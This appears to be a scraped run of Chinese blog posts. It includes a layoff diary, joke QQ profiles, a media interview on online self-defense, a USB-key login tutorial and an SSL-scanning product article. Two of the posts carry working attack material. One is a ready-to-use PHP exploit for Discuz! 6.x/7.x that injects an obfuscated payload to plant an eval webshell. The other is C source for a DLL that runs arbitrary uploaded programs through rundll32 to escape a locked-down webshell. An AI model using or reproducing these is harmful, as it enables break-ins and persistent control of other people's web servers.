寒冷的冬天

今天窗外依旧是温暖的阳光,温暖到我都不想动弹的阳光。但心里很冷,甚至冷的发抖。

以前只听说别的地方公司倒闭、裁员、减薪,没想到这么快就到我们公司了。半个小时以后公司全体员工都要到公司食堂开会,宣布一批待岗人员名单。虽然暂时还没有涉及到我们部门,但人心已经开始乱了。如果今年就开始待岗,明年的经济形势比今年更差,如何应对,裁员无疑是唯一的前期选择?

08年,对全球,对中国,对我们每一个人都将是一个不平凡也不顺利的年份。经济危机第一次让我们有了切身感受,看着电视上如潮的求职者,也许明天自己就会是其中一份子,拿着简历一个一个摊位的跑,不,不是跑,是去挤,否则连递上简历的机会都没有。

就这样惶恐的走过08年。。

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/other/495

大众化QQ资料集合

1”的QQ资料:
  
  陪人聊天,每字6毛,标点符号半价收费,千字以上打8折!先付款,后聊天,款到即聊。对待非专业人士,偶不承担主动交谈义务。网络虚假,若受伤、受骗,偶不承担任何责任。

  
“2”的QQ资料:
  
  1980年中国制造,长178cm,净重66kg。采用人工智能,各部分零件齐全,运转稳定,经二十多年的运行,属质量信得过产品。该“产品”手续齐全,无限期包退包换。现因发展需要,诚招志同道合者,共同研制开发第二代语言聊天软件,有意者请联系!

  
  “3”的QQ资料:
  
  每个女人都是为爱而折翼的天使,她们来到人间,就再也回不去天堂了,所以需要男人好好的珍惜。我也是天使,不过降落的时候不小心脸先着地了,回不去天堂是因为体重的原因。还好,我还有一颗天使的心,善良、仁爱。

  
  “4”的QQ 资料:
  
  人还不错,除了长的帅点以外,也没什么缺点了!我有时候觉得,自己其实不太帅。但有一天,我被一群女孩子围住,她们说我帅,我不承认,她们就打我,还说我虚伪。
  
  

“5”的QQ资料:
  
  我是宇宙超级网虫,欢迎你打我、骂我、K我、扁我、踢我、踹我、揍我,甚至把我煮、煎、炒、炸、焖、炖、红烧、清蒸、干褊、水煮……我都毫无怨言,但前提是:这个人必须是天底下最最漂亮、可爱、美丽、温柔、善良、贤惠、有气质的大美女–某某(女友名字)
  
  “6”的QQ资料:
  
  别看资料,看聊效!!!
  
  “7”的QQ资料:
  
  曾经有个女孩子要与我共赴黄泉–“你再不还我钱,我就和你同归于尽!”曾经有个女孩子与我相约到下辈子–“想追求我?下辈子吧!”曾经有个女孩子肯为我而死–“跟你在一起,我宁愿死!”
  
  “8”的QQ资料:
  
  家穷人丑,一米四九。小学文化,农村户口。破屋三间,薄田一亩。冷锅热灶,老婆没有。一年四季,药不离口,今日上网,广征女友,革命路上,并肩携手~~
  
  “9”的QQ资料:
  
  女口果人尔能看日月白这段言舌,那言兑日月人尔白勺目艮目青有严重白勺散光.。
  
  “10”的QQ资料:
  
  我想要个健康平凡的,会炒番茄鸡蛋的,会*作@衣机的,脸上可能还有点小雀斑的,见到生人会脸红的,知道酱油多少钱一瓶的,在我把大米扛回家时会帮我擦擦汗的那么一个姑娘。这样的要求,高不高?如果真的有那么一个姑娘,那么神啊,我祈求你赐我一个吧!
  
  “11”的QQ资料:
  
  小人本住在黄河的一边,家中有屋又有田,生活乐无边。自从有了OICQ,它占我时间夺我钱,逼我卖楼又卖田,流落在街边……各位朋友可怜我,陪我聊聊天!聊聊天!
  
  “12”的QQ资料:
  
  上网了吧,网恋了吧,幼稚

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/other/496

陕西知名报纸《华商报》报导“人肉防御”概念

2008年10月13日,我在自己的博客提出了?人肉防御?的概念。随后在我的好友和读者圈内引起了一些共鸣和反思。但一直并没有被业界所更明确地关注。之后,大约是在10月底,有几家网络媒体先后转载了我的这篇文章。但基本上也是因?人肉?二字可能吸引眼球而原文转载,并没有深入去谈这个概念,更没有与我联系。

其实,我一直希望能将自己在互联网行业中积累的价值观,至少是一种健康的价值期望与那些不了解这一行业的人们分享:而这些受众,更关注传统媒体:报刊、电视。

前几天,陕西第一大报《华商报》的主持人敬江晴女士与我取得了联系,表达了对?人肉防御?的关注和兴趣,同时也围绕这一概念,对我进行了一次简单的采访。

今天,《华商报》b8版发表了一篇《拥有一颗保护自己和他人的心》的文章,正是敬江晴女士对?人肉防御?概念的通俗化表达。我非常高兴,也非常荣幸能够与报纸媒体一起推行这种对网民有益的概念和意识形态。

全文大家可以在上面给出的链接看到,而我这里也顺便公布一下采访的原文,以供有兴趣的朋友参考(比较冗长,了解我本意的朋友们不用浪费时间了):

Q:反人肉搜索的问题,早先就有不少业内人士已经提出,也有不少网友在参与人肉的过程中也已经自觉的认识到了人肉搜索的危害,特别是在"****1986"事件中。
提出"人肉防御"概念的,从我了解的情况来看,你应该是第一人,是么?
A:我只是第一个在自己的博客说出"人肉防御"这四个字而已。我相信和我想法相同的人肯定有,而且不少:无论是科研机构里的"学院派",还是民间的自由职业者、热心网友。其实所表达的大致意思都是积极健康的。

Q:豆瓣里还有个"网络暴力研究"小组,你知道么?民间有个叫朱光兵的人,被称为"朱抢抢"的,也成立了民间反人肉联盟,你是怎么看待这些现象的呢?
A:我知道,但我并没有特别的关注。我个人觉得,我提出的"人肉防御"的一大特点就在于"冷静独立地观察", 而不是冲到论坛里去批斗他人(那样和人肉搜索的批斗不也类似了吗)。当然,有人因人肉搜索而遭遇伤害最终呼吁公众提高防御意识,我觉得初衷是好的。对于成 立反人肉联盟、反暴力小组的方式,我还是持观望态度:因为这样也增加了一种冲突的爆发渠道。况且真的要反暴力、反人肉,就要尽量不参与、不讨论这些事情。 否则还是帮它人所炒作了。

Q:从你对"人肉防御"概念的提出,以及解释,"人肉防御"是不是主要指的是一种意识,对于反人肉搜索的一种意识?
A:不全对。"人肉防御"主要是指一些意识性技能(此事已经有意识了,这样才能防御嘛)。譬如甄别正确信息的技能。以最近CCTV曝光百度竞价排名将部分广告位出售给欺诈网站的 事件为例,我认为"加强内功(技能)"比"等着监管部门去把骗子绳之以法"更加有力。互联网的匿名信息发布十分廉价,可以说骗子无处不在。此时,提高自己 的人肉防御能力是非常重要的。比如你想了解某一保健品是否值得购买,最好使用不同的搜索引擎对比搜索,如Google、Yahoo,同时也要在百度贴吧、 百度知道、天涯社区、水木清华社区等知名的互联网社区中搜索。而且一定要跟踪信息发布者的身份(如果一个人在百度贴吧里的发言全部是说某一个产品多么多么 好,那十有八九是骗子)。总而言之,我们无法奢求中国互联网的诚信体系能在一两天内就做到完美,所以一定要提高自身的防御能力。
我提出的"人肉防御"和"反人肉搜索"还是有很大区别的:我并不想去和人肉搜索的支持者争执什么,我只是在告诉那些参与到人肉搜索的网民,如何防御欺诈和陷阱,保护自己的利益。

Q:看到你对各种人肉危害都给出了防御的对策,在对kappa女的问题中,你说到"人肉防御决不是一种强迫"是什么意思?"我也毫 不同情那些为了看了kappa女视频中病毒的人"是指的是类似于当时有人恶意在"艳照门"搜索中植入病毒的情况是吧?这个意思里面是不是也包含有从自身的 意识上来防御的含义,比如我的同事听我说到了kappa女的事情,根本就不去点击我给的链接,她是不是就属于一种自我防御强的人?
A: 人肉防御不是一种强迫的意思就是:我们无法强迫那些不停地在网络上寻找kappa女视频的网民立即意识到这些问题可能对他们造成的危害(譬如中病毒)。不 过你的女同事的例子我觉得和"人肉防御"的关联并不是特别大。客观地,女性一般对类似的新闻不会太关注,因此(在这个案例中)她并不需要人肉防御(的保 护)。真正需要保护的,是许多无法得到生理满足却又被这个商业社会中性暗示所不停刺激的年轻人。他们作为正常人,有本能驱使去寻找这些视频、图片,因此很 可能被垃圾网站所利用。例如当年艳照门事件时,百度贴吧里到处都是木马链接,我相信是会有很多人去点的。

Q:为什么说,"对于一个渴望独立思考并建立自己价值观的人来说,我认为,培养人肉防御观念是有必要的"能不能再具体解释下。
A:人肉防御并不适用于每一个人:至少不适用于那些太过于依赖他人的人。

Q:你最早提出人肉防御是什么时候,在互联网界有多少专业人士认可你的理论?
A:我是在2007年的WordCamp上 萌生这一想法的。但在博客上最早提出是今年10月份。其实我更多地是把它作为一种"独立的冷静"、"非暴力不合作"的中性工具看待:我可以防御他人(的误 导),你也可以防御我(的误导)。在业界对这一理论的认可我很难跟踪,但从我博客和校内日志的留言情况来看,身边不少朋友还是认同的。

Q:你认为你提出的人肉防御和其他人所说的反人肉搜索有什么不同?
A:我提出的"人肉 防御"是一个比较泛的概念,出了字面上有点类似之外,并不针对"人肉搜索"而言的。它是针对互联网可能给人所构成的各种伤害的一种防御。而且,它更强调一 种技能。至于"反人肉搜索",我认为应该是针对这种"人人充当法官"的"文革式大批斗"的一种抵触意识,同时也更多地站在事件中心的人物情感出发去思考问 题。而这些特点是"人肉防御"并不具备的。

Q:人肉搜索从开始就是个很有争议的问题,你认为你所倡导的人肉防御在网民中会有多少支持度,未来发展走向会怎样?
A: 其实我个人对"人肉搜索"并不是全盘否定的态度。就像《中国游行法》给予人民合法游行的权利一样。我对"人肉防御"的支持率和发展也没有太大兴趣,也从来 不抱期望。主要原因是因为"人肉防御"是一个属于收敛意识形态范畴的概念。我认为需要这种防御技能的人自然会支持;或者,当一个人反复地上当受骗之后,它 自然要提高防御技能了。对于那些不需要人肉防御的人,千万不要
强迫他去接受。

Q:从实践意义上讲,你的人肉防御会对互联网的游戏规则产生多大影响?
A:除了能保护防御者之外,乐观地估计,我的"人肉防御"可能会在小范围内有2点影响,其实也是相辅相成的:
1、让那些投机分子损失一些利益:例如欺骗你说点击某一个链接会下载艳照门的视频但结果发现下载到的文件是木马、病毒。如果人人都能人肉防御,那么他的病毒就扩散不出去。
2、 让原创内容和有价值信息的提供方获取一些利益:简单的例子,我在陕西开一家报纸叫《新华商报》,然后抄袭你们的文章并把广告位疯狂的卖给欺诈公司,你的利 益肯定会备受损失。然而如果民众有强烈的?人肉防御?的意识,他们就会发现我抄袭文章之中的诸多疏漏(抄袭肯定是不如原版的)。我的这份《新华商报》肯定 是没有发行量的,广告收入也不可能获得,而那些骗子也就无人可骗了。人们会选择你们正宗的《华商报》,广告主会继续把高价位的广告投给你们。

Q:人肉防御,请不要被我所误导:你所说的误导是个什么意思
A:我是一个十分强调独立思考并尊重个人主见的人,我自己也希望和他人的沟通时,双方能开诚布公、兼听则明。我在博客发表的文章和概念,肯定有我的主观性,我绝不强求他人无条件接受我提出的理论,以免被我误导。我也希望每一个提出自己观点的人能够尊重他人的不同观点存在。

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/it-web-news/497

用U盘就可进入有密码的Windows系统

【赛迪网-IT技术报道】U盘 如今可以说非常普及了,不过,如果只是把它用来存储数据的话,也许有点可惜了。其实,我们还可以让U盘发挥更大的能量!今天小编教你一招,能让你的U盘代 替登录系统的密码,只有当你插上U盘才能正常进入系统操作,否则任何操作都无法进入系统。怎么样,是不是很有兴趣一试?

要想成功实现上述功能,我们需要借助名为Disklogon的小工具,它是一个功 能强大的安全设置工具,可让我们使用优盘、软盘等移动设备来登录系统,可在登录时免于输入用户名和登录密码;而一旦移走了这些设备,系统便可以设置为自动 锁定或关机。下面就来看看如何设置让优盘变成控制登录系统的?密钥盘?。

点击进入Disklogon下载页面
http://bbs.tech.ccidnet.com/read.php?tid=626153

完成软件安装之后按要求重新启动,之后在进入系统的画面中单击?Password?按钮,然后使用键盘输入密码登录(如果之前设置了使用密码登录的话)。但我们是不希望每次都这样繁琐的,下面就来设置一下让优盘发挥更强大的功能,让它直接来控制系统登录。

直接开始菜单中单击?Disklogon Options?进入设置界面,随后依次执行如下步骤设定:

Step1:依次执行?Options/Disklogon/Disks?操作,窗口右侧中默认将所有的盘符都勾选了,但我们只希望用优盘来作为密钥盘,所以只勾选优盘的盘符(例如笔者的为L:)。

Step2:单击窗口左侧的?Options/DiskLogon/General?分支,接下来,我们要在右侧设置有优盘和无优盘时的不同操作:

1.在?Disk removal behavior?下拉列表框中选择?Lock computer when the disk is removed?(当磁盘被取出后将电脑锁定),这样当优盘被拔除后系统就自动锁定了;如果想在拔除优盘后自动注销,则可选择?Log off when the disk is removed?。

2.在?Log on to Windows?下拉列表框中选择?Log on when disk is connected?(当链接有优盘时自动登录系统),这样,如果在开机后没有连接优盘,则不能进入系统。

3.在?Unlock computer?下拉列表框中选择?Unlock computer when the disk is connected?(当连上优盘时自动解除对系统的锁定)。

小贴士:默认情况下,系统登录时,如果没有没有连接优盘,用户可点击 ?Cancel?然后手工输入用户名和密码来进入系统。但为了增强安全性,去掉?Allow users to type their usename and password to log on or unlock computer?(允许用户输入用户名和密码来登录或解锁系统)选项!如此一来没有优盘插入就无法登陆系统了。

控制系统登录之 创建登录信息

Step3:完成上述设置后,我们就可以进行最后一步设置了,即登录 系统解锁时所用的用户名和密码。点击进入?User Accounts?标签,随后点击?Change Logon information?区域处的?Change?按钮,进入用户名、密码创建界面(图2)。具体步骤:在?Step1?区域选择当前系统中正在使用的U 盘,接着点击?Step2?区域选择某ID号(如01),此时?Create New?将呈现可用状态,点击该按钮,并在随后的弹出窗口中输入用户名及密码即可。

如果希望用加密算法对登录信息进行加密,可勾选对话框中的?Encrypt this logon information with strong encryption algorithm?选项。添加完成后单击?close?按钮返回主窗口。

小贴士:设置了登录用户名和密码后,优盘根目录下会生成一个名为logon.dln的文件,这个文件不能删除!否则,下次重新启动时即使你插上了优盘,也会因为系统不能读取?指纹?而导致进不了系统!

至此,所有相关设置已经完成,现在你的U盘就已经是密钥盘了。在没有连接优盘的情况 下根本是无法进入系统的;而在系统使用中途,如果将优盘拔除,系统便会自动锁定?单击对话框中的?Unlock?也是无效的,除非再次将优盘连接到电脑 中。目前软件只支持Windows 2000/XP/2003系统。

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/pc-tech/498

Discuz! 6.x/7.x SODB-2008-13 Exp

复制内容到剪贴板程序代码程序代码
1 #!/usr/bin/php
2
3 /** * Discuz! 6.x/7.x SODB-2008-13 Exp * By www.80vul.com * 文件中注释的变量值请自行修改 */
4
5 $host = 'www.80vul.com';
6 // 服务器域名或IP
7 $path = '/discuz/';
8 // 程序所在的路径
9 $key = 0;
10 // 上面的变量编辑好后,请将此处的值改为1
11
12 if (strpos($host, '://') !== false || strpos($path, '/') === false || $key !== 1)
13 exit("专业点好不,先看看里面的注释 -,-\n");
14
15 error_reporting(7);
16 ini_set('max_execution_time', 0);
17
18 $key = time();
19 $cmd = 'action=register&username='.$key.'&password='.$key.'&email='.$key.'@80vul.com&_DCACHE=1';
20 $resp = send();
21
22 preg_match('/logout=yes&formhash=[a-z0-9]{8}&sid=([a-zA-Z0-9]{6})/', $resp, $sid);
23
24 if (!$sid)
25 exit("哦,大概是没有开启WAP注册吧 -,-\n");
26
27 $cmd = 'stylejump[1]=1&styleid=1&inajax=1&transsidstatus=1&sid='.$sid[1].'&creditsformula=${${fputs(fopen(chr(46).chr(46).chr(47).chr(102).chr(111).chr(114).chr(117).chr(109).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(101).chr(118).chr(97).chr(108).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(93).chr(41).chr(63).chr(62).chr(56).chr(48).chr(118).chr(117).chr(108))}}';
28 send();
29
30 $shell = 'http://'.$host.$path.'forumdata/cache/eval.php';
31
32 if (file_get_contents($shell) == '80vul')
33 exit("好了,去看看你的WebShell吧:\t$shell\n里面的代码是:\t\$_POST[c])?>\n别告诉我你不会用 -,-\n");
34 else
35 exit("嗯,大概是该网站不存在漏洞,换一个吧 -,-\n");
36
37 function send()
38 {
39 global $host, $path, $url, $cmd;
40
41 $data = "POST ".$path."wap/index.php HTTP/1.1\r\n";
42 $data .= "Accept: */*\r\n";
43 $data .= "Accept-Language: zh-cn\r\n";
44 $data .= "Referer: http://$host$path\r\n";
45 $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
46 $data .= "User-Agent: Opera/9.62 (X11; Linux i686; U; zh-cn) Presto/2.1.1\r\n";
47 $data .= "Host: $host\r\n";
48 $data .= "Connection: Close\r\n";
49 $data .= "Content-Length: ".strlen($cmd)."\r\n\r\n";
50 $data .= $cmd;
51
52 $fp = fsockopen($host, 80);
53 fputs($fp, $data);
54
55 $resp = '';
56
57 while ($fp && !feof($fp))
58 $resp .= fread($fp, 1024);
59
60 return $resp;
61 }
62
63 ?>
64

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/499

用Webwasher防止恶意软件利用HTTPS通信

      Webwasher如何通过SSL扫描器模块,防止恶意软件利用HTTPS通信。它还可以防止用户通过流行的CGI代理绕过传统的Web内容过滤 器。这对于阻止敏感数据离开公司网络是很重要的。除了其SSL扫描器,Webwasher还提供了其它几个模块,如URL过滤、反恶意软件、传统的反病 毒、反垃圾邮件、内容报告器、IM过滤器等,你可以根据需要选择。

      我们将讨论恶意软件(和用户)如何利用SSL绕过你的其它控制,以及Webwasher如何解决这个问题。

      公司存在着哪些SSL问题?

      Web加密对于今天的企业来讲是非常重要的,不过对于防火墙上开放着端口443(HTTPS通道)的企业来说,在其网络中存在着一个严重的安全漏 洞。传统的防火墙和网关反病毒方案并不能扫描加密的通信,因此也就不能控制哪些内容通过HTTPS进入和流出企业网络。这向企业提出了一种风险,企业可能 并没有认识到,它们不能依靠其HTTP过滤器来保护HTTPS的加密通信。

      风险还存在于规章制度的一致性上。如果一个组织允许开放SSL通道(它包含规章制度极力控制的机密信息),它还能保持一致性吗?此外,黑客们和恶意 的雇员等都知道通过HTTPS通道进行的通信完全开放并未加保护,因此他们就会继续利用HTTPS协议来绕过内容过滤机制,用以传播潜在的恶意内容。

      如今,有很多URL过滤避绕代理可以利用HTTPS连接。当前,没有一个已确定的防火墙或Web网关反病毒解决方案能够进入其中查看这种通信。此外,我们看到一些流行的广告软件和间谍软件从IRC和HTTP转换到了HTTPS协议,其目的是避开已确立的网关过滤器。

      Webwasher如何解决这个问题

      我们认为唯一可行的方案是临时对SSL通信解密,扫描,然后再重新加密。

      这种方法与现在流行的代理服务器防火墙的做法不同。后者仅是解密(换句话说,即?终止?),运用病毒扫描,然后转发到终端用户或Web应用程序。这种安全措施不能用于今天的Web环境,因为它会使端到端的加密需求无效,并会使浏览器产生混乱。

      SSL安全代理,如Webwasher就如同一个?黑盒子?一样动作。SSL的加密通信进入,然后SSL的加密通信流出。任何人都不能加密的部分或 在网络上嗅探它,这完全是在内存中处理的。现在有几个方案能够在一个单独的机器上提供SSL解密,将解密的通信转发到一个扫描器,扫描器将此通信返回到 SSL方案,SSL方案对其重新加密。此外,典型情况下,你需要调整策略,例如,允许上层管理人员执行在线业务而无需扫描,但要对其他任何人的通信都要扫 描。在多数情况下,这会要求双倍的管理成本,不过用Webwasher实现则轻松得多。

      Webwasher SSL扫描器如何精确地工作?

      基本说来,我们要做的是要将浏览器与服务器之间的一个SSL连接分为两个独立的SSL连接。对于浏览器连接到加密的Web站点的请 求,Webwasher SSL扫描器实际上为浏览器执行此操作。这样的一个好处是具备了执行SSL证书检查的能力,而不是将它留给终端用户。我们都清楚这种弹出窗口,它问我们 说,我们启动了一个与加密Web站点的会话,你是否想接受证书?我们看到,许多情况下,90%的或更多的终端用户只是单击?接受?,并不关心证书的合法 性,是否自签名,是否到期等。一旦Webwasher确认了证书的合法性,我们就启动了一个SSL会话,然后终止之。

      对于Web服务器来说,Webwasher充当着一个正常的浏览器。这样我们拥有了加密的通信,而且能够运用内容安全、反病毒、反恶意软件和转出的 内容过滤器等机制。记住,所有的这一切者都是在同样的机器上和内存中进行的,因此这里并不存在什么私密问题。一旦我们搞定了过滤问题,我们就充当了真实终 端用户的一个Web服务器。Webwasher用客户公司证书或一个拥有Web服务器名字的自签名证书重新加密通信。如果你连接到了自己的服务器账户上, 授权证书还会描述其它内容。客户需要做的是展示其自身的正式证书或自签名证书,终端用户将不会再收到授权证书的消息弹出窗口。

      IT部门需要维持证书的优良者名单吗?用户们是否会抱怨?

      我们能够使管理成本接近于零。Webwasher部件或软件在日常的活动基础上检查已撤消的证书,因此你总能保持最新。Webwasher还采用了 一种培训模式。因此,用户可以启动Webwasher SSL的扫描器,基本上它会接受提供的所有证书,并加以存储。在培训结束之后,管理人员就可以进入并查看有请求了哪些证书,并放弃那些不正常的证书。 Webwasher提供了一套工具,借此管理人员并不需要成为一个事件专家。一旦这个培训阶段结束,管理成本就微乎其微了。

      Webwasher如何防止用户利用SSL代理服务器避开Web内容过滤器?

      如前所述,现在有大量的用户上网冲浪是依靠SSL的加密通信的。典型情况下,URL的过滤器厂商会将应用程序试图连接的服务器列入黑名单,设法阻止 其访问。不过,这是一场没有结束的战斗,总会有一个厂商建立一个新的服务器而你没有对其阻止。而且还涉及到数据丢失问题。我们可以看到典型的间谍软件和广 告软件从IRC和HTTP后端通道转向了HTTPS后端通道,因为黑客们已经断定这个通道并没有阻止或加以控制。这方面的两个流行的例子即是Gator和 Cool WebSearch。

      举例来说,可以对Webwasher进行配置,只允许某些合法的信用卡号码,以及属于于银行和购物站点种类的已知站点。即使你用一个特洛伊木马试图 窃取PC机上的一个信用卡号码,它也不可能将这个信息返回;更不用说通过HTTPS进行了。用户还可以采用针对即时通信和点对点的方案,只是这些方案不在 同一台机器上而已。

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/500

艰难的在webshell中执行程序

摘要:一个web shell,系统权限设置得很好,常用的exe都无权执行。可写目录传上去的exe文件,也没有执行权限。最终发现设置权限的时候漏掉了rundll32.exe,如是就写了这个个代码。

测试开始的时候,PHP似乎没权执行命令。本来打算用php本身的一些溢出问题,溢出一个低权限的shell来的。后来意外发现使用proc_open函 数可以执行一些内部命令,只是外部命令和目录都做了比较严格的权限设置而已。于是就测试可能可以利用的外部命令,最终测试到了rundll32.exe程 序,终于没有返回权限不足。写一个dll,给rundll32调用,就可以间接的执行自己上传的任意exe文件了。也许是windows权限的一点小问 题?毕竟使用rundll32间接执行的exe,身份还是php shell的guest权限,虽然调用者变了??真正原因有待进一步研究。

复制内容到剪贴板程序代码程序代码
1 /************************************************************************************************* * 遇到一个服务器权限设置很畸形,系统exe基本都无法执行,自己上传的exe到可写目录,也不能执行。 * 遗憾的是,他们漏掉了rundll32.exe这个文件的权限,如是?? * code by wustyunshu###hotmail.com, 2008,11,13,23:20 *************************************************************************************************/
2
3
4
5 #include
6
7 #include
8
9 #include
10
11
12
13 // dll入口
14
15 BOOL APIENTRY DllMain( HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved )
16
17 {
18
19 return true;
20
21 }
22
23
24
25 void RunExe( HWND hwnd, HINSTANCE hinst, LPSTR szCmdLine, int nCmdShow)
26
27 {
28
29 if( szCmdLine == NULL )
30
31 {
32
33 return;
34
35 }
36
37
38
39 DWORD dwNum = MultiByteToWideChar(CP_ACP, 0, szCmdLine, -1, NULL, 0);
40
41 wchar_t *wszCmdLine = new wchar_t[dwNum];
42
43 if(!wszCmdLine)
44
45 {
46
47 return;
48
49 }
50
51 MultiByteToWideChar(CP_ACP, 0, szCmdLine, -1, wszCmdLine, dwNum);
52
53
54
55 int argc;
56
57 LPWSTR *argv = CommandLineToArgvW( wszCmdLine, &argc );
58
59
60
61 wchar_t Cmd[256] = { 0 };
62
63 wchar_t Args[1024] = { 0 };
64
65
66
67 //strncpy( Cmd, argv[0], sizeof(Cmd)-1 );
68
69 wcsncpy( Cmd, argv[0], sizeof(Cmd)-1 );
70
71 if( argc > 1 )
72
73 {
74
75 for( int index = 1; index < argc; index ++ )
76
77 {
78
79 wcscat( wcscat( Args, L" " ), argv[index] );
80
81 }
82
83 }
84
85
86
87 STARTUPINFO si;
88
89 memset( (void *)&si, 0, sizeof(STARTUPINFOA) );
90
91 GetStartupInfoW( &si );
92
93
94
95 //新进程输入输出重定向
96
97 si.cb = sizeof( si );
98
99 si.dwFlags = STARTF_USESHOWWINDOW;
100
101 //si.wShowWindow = SW_HIDE;
102
103
104
105 PROCESS_INFORMATION processInfo;
106
107 memset( (void *)&processInfo, 0, sizeof(PROCESS_INFORMATION) );
108
109
110
111 //建立进程
112
113 CreateProcessW( Cmd, Args, NULL, NULL, 1, 0, NULL, NULL, &si, &processInfo );
114
115
116
117 Sleep( 60 * 1000 );
118
119 TerminateProcess( processInfo.hProcess, 0 );
120
121 }
122

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/501